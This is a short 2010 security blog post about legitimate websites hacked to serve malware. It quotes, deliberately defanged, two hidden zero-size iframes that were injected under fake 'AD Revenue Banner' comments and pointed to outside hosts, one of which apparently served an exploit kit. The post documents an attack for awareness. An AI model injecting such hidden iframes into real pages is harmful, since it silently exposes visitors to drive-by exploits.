Thursday, October 7, 2010

Hacked Websites

It's probably no surprise that a major vector for malware entering the enterprise is hacked, so called "legitimate" websites. There is actually no such thing as a trusted website any longer. I've seen so many innocous websites that have been serving malware, either because they are hacked, or through malicous advertising. Nothing new really, if you've been following what's happening in the IT security world for the last couple of years.

Today though, I saw a website that is apparently hacked and instead of a subtle hidden iframe being inserted, there is this (intentionally munged):


[!--AD Revenue Banner: DO NOT REMOVE --]
[iframe name="yLeVaTapAV" src="hxxp://host30.freepicturebox.com/blog/cgi-bin/index.php" marginwidth="1" marginheight="0" title="YMeWErAbed" border="0" width="1" frameborder="0" height="0" scrolling="no"][/iframe]
[iframe name="ubYLuZYXun" src="hxxp://serv59.freepicturebox.com/logfile/index.php" marginwidth="1" marginheight="0" title="arepAhEZuN" border="0" width="1" frameborder="0" height="0" scrolling="no"][/i frame]
[!--AD Revenue Banner: DO NOT REMOVE --]


Maybe an attempt by the hacker to hide the malicious iframes "in plain sight"?

One of these sites serves up highly obfuscated javascript, and from my logs was serving up what looked like the CrimePack exploit kit.

No comments:

Post a Comment